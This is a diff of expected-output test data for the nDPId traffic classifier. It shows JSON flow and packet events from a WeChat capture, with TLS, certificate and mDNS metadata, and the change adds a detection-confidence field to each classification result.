 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1492167617560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167617560,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701\/B3aGGedWdcKASN8hYRQAAAgQFoAQCCApFrkDUADG7\/gEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1492167617560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167617560,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JpJAAEAG7rLAqAFny82XotNfAbt51Z1wwd2hh4AQAOW9kgAAAQEICgAxvExFrkDU"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167617562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0KCxAACwGAHnLzZeiwKgBZwG7016qUxmsLakleYAQAJ8hsQAAAQEICkWuQNUAMbv9"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167617598,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0701AAC0GOFfLzZeiwKgBZwG7011ZGE0wTWdde4AQAOqB1AAAAQEICkXSpjoAMbv9"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1492167617850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167617850,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Andsj9g29laaASN8iTkQAAAgQFoAQCCApF0qaCADG8PAEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1492167617850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167617850,"pkt":"8IQvSpdgeJKcD6iOCABFAAA02VVAAEAGO+\/AqAFny82XotNgAbuDb2VpJ3bI\/oAQAOX41AAAAQEICgAxvJRF0qaC"}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167619048,"flow_last_seen":1492167619048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167619048,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1492167619048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167619048,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Dr9AAEAGBobAqAFny82XotNaAbub+DW+SvgsEIARAOUtjAAAAQEICgAxvcBFrgFX"}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":880,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167639304,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -268,51 +268,51 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1492167640138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167640138,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8VUZAAEAGv\/bAqAFny82XotNiAbsbK4ceAAAAAKACchBmfwAAAgQFtAQCCAoAMdJYAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167640203,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Ea0aYHbXWdhqASN8gHqwAAAgQFoAQCCApF8injADHSGQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167640203,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0T51AAEAGxafAqAFny82XotNhAbttdZ2GGtGmCIAQAOVs9wAAAQEICgAx0mhF8inj"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1492167640450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167640450,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702LyUvm4GyuHH6ASN8hErAAAAgQFoAQCCApF8iogADHSWAEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1492167640450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167640450,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0VUdAAEAGv\/3AqAFny82XotNiAbsbK4cf8lL5uYAQAOWp+QAAAQEICgAx0qZF8iog"}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167641988,"flow_last_seen":1492167641988,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167641988,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1492167641988,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167641988,"pkt":"AQBeAAD7eJKcD6iOCABFAABEonJAAAERNCzAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":924,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167641988,"flow_last_seen":1492167641988,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167641988,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":924,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167641988,"flow_last_seen":1492167641988,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167641988,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167641988,"flow_last_seen":1492167641988,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167641988,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1492167641988,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167641988,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167641988,"flow_last_seen":1492167641988,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167641988,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167641988,"flow_last_seen":1492167641988,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167641988,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1492167641988,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167641988,"pkt":"AQBeAAD7eJKcD6iOCABFAABEonNAAAERNCvAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1492167641988,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167641988,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1492167642989,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167642989,"pkt":"AQBeAAD7eJKcD6iOCABFAABEo2tAAAERMzPAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
